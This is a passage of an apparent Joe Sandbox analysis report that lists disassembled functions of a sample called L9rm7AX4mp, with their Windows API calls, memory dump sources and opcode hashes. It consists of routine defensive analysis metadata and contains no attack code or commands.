                                                                                                      • Opcode ID: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                                                                      • Instruction ID: 9902e76ed030cf172564c6423cfc444f456bf65fce7539c2ce1f68efba32f602
                                                                                                      • Opcode Fuzzy Hash: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                                                                      • Instruction Fuzzy Hash: 4D017134A452019EEB11BBA5DD8AB5B27C45F10B09F08083BB9029F2A3CB6D9D41D71C
                                                                                                      Function 00462ABC Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00462B90), ref: 00462B14
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B50
                                                                                                      • FindClose.KERNEL32(000000FF,00462B77,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B6A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 3541575487-0
                                                                                                      • Opcode ID: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                                                                      • Instruction ID: 0f193a6fcf1d943c675bf75123405c31ceeb2ecab595186adb6c93933d2a98b0
                                                                                                      • Opcode Fuzzy Hash: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                                                                      • Instruction Fuzzy Hash: 7121D871904B087EDB11DF65CC51ADEBBACDB49704F5084F7E808E31A1E6BCAE44CA5A
                                                                                                      Function 004241EC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 004241F4
                                                                                                      • SetActiveWindow.USER32(?,?,?,0046CFFB), ref: 00424201
                                                                                                        • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                        • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,020725AC,0042421A,?,?,?,0046CFFB), ref: 00423B5F
                                                                                                      • SetFocus.USER32(00000000,?,?,?,0046CFFB), ref: 0042422E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveFocusIconicShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 649377781-0
                                                                                                      • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                                      • Instruction ID: 85e094fd83fda52d6ba69bb43f194f943737e29f022f28d5c3d7585fd8a6de7d
                                                                                                      • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                                      • Instruction Fuzzy Hash: ECF03A717001208BDB10EFAAA8C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                                      Function 00417CDE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 00417D1F
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Placement$Iconic
                                                                                                      • String ID:
                                                                                                      • API String ID: 568898626-0
                                                                                                      • Opcode ID: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                                                                      • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                                      • Opcode Fuzzy Hash: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                                                                      • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                                      Function 004175A8 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureIconic
                                                                                                      • String ID:
                                                                                                      • API String ID: 2277910766-0
                                                                                                      • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                                                      • Instruction ID: edcb67aebd7cb7e0e4c3241a821d6ac110e093164443c601d5aebb18a23c44a8
                                                                                                      • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                                                      • Instruction Fuzzy Hash: A2F04F32304A028BDB21A72EC885AEB62F5DF84368B14443FE415CB765EB7CDCD58758
                                                                                                      Function 004241A4 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 004241AB
                                                                                                        • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                        • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                        • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                        • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                      • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                                        • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2671590913-0
                                                                                                      • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                                                      • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                                                      • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                                                      • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                                      Function 004125E8 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                                                                      • Instruction ID: 2af12fea25256c3ae9471bae8fd4feed52cec15eb5e351c91de8273fd3ce68b3
                                                                                                      • Opcode Fuzzy Hash: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                                                                      • Instruction Fuzzy Hash: 055106316082058FD710DB6AD681A9BF3E5FF98304B2482BBD814C7392D7B8EDA1C759
                                                                                                      Function 004789DC Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478B2A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                                                                      • Instruction ID: 518aae51b6d6b411e39a58dd47dc5b2362a2c83c3bfed1ee6c3543fdde473bb3
                                                                                                      • Opcode Fuzzy Hash: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                                                                      • Instruction Fuzzy Hash: 04413775644104DFCB10CF99C6898AAB7F5FB48310B74CA9AE848DB705DB38EE41DB54
                                                                                                      Function 0045D5A0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D5AB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptFour
                                                                                                      • String ID:
                                                                                                      • API String ID: 2153018856-0
                                                                                                      • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                                                      • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                                                                      • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                                                      • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                                                                      Function 0045D5B8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DDBC,?,0046DF9D), ref: 0045D5BE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptFour
                                                                                                      • String ID:
                                                                                                      • API String ID: 2153018856-0
                                                                                                      • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                                                      • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                                                                      • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                                                      • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                                                                      Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3288599744.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3288584758.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3288619634.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10000000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                      • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                      • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                      • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                      Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3288599744.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3288584758.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3288619634.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10000000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                      • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                      • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Function 0044B668 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044B614: GetVersionExA.KERNEL32(00000094), ref: 0044B631
                                                                                                      • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                                      • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                                      • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7D9
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7EB
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7FD
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B80F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B821
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B833
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B845
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B857
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B869
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B87B
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B88D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B89F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8B1
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8C3
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8D5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8E7
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8F9
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B90B
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B91D
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B92F
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B941
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B953
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B965
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B977
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B989
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B99B
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B9AD
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9BF
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9D1
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                                      • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                      • API String ID: 1968650500-2910565190
                                                                                                      • Opcode ID: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                                                                      • Instruction ID: 346aa6b979044c2d6f95573bc57da9b6801dc261a15d858c7a91061cf3dc2738
                                                                                                      • Opcode Fuzzy Hash: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                                                                      • Instruction Fuzzy Hash: CC91E7B0A40B50EBEF00EBF5ADC6A2637A8EB15B14714467BB444EF295D778D800CF99
                                                                                                      Function 00458184 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 237filesynchronizationprocessCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateMutexA.KERNEL32(00499B18,00000001,00000000,00000000,004584B9,?,?,?,00000001,?,004586D3,00000000,004586E9,?,00000000,0049B628), ref: 004581D1
                                                                                                      • CreateFileMappingA.KERNEL32(000000FF,00499B18,00000004,00000000,00002018,00000000), ref: 00458209
                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9,?,?,?), ref: 00458230
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045833D
                                                                                                      • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9), ref: 00458295
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      • CloseHandle.KERNEL32(004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458354
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045838D
                                                                                                      • GetLastError.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045839F
                                                                                                      • UnmapViewOfFile.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458471
                                                                                                      • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458480
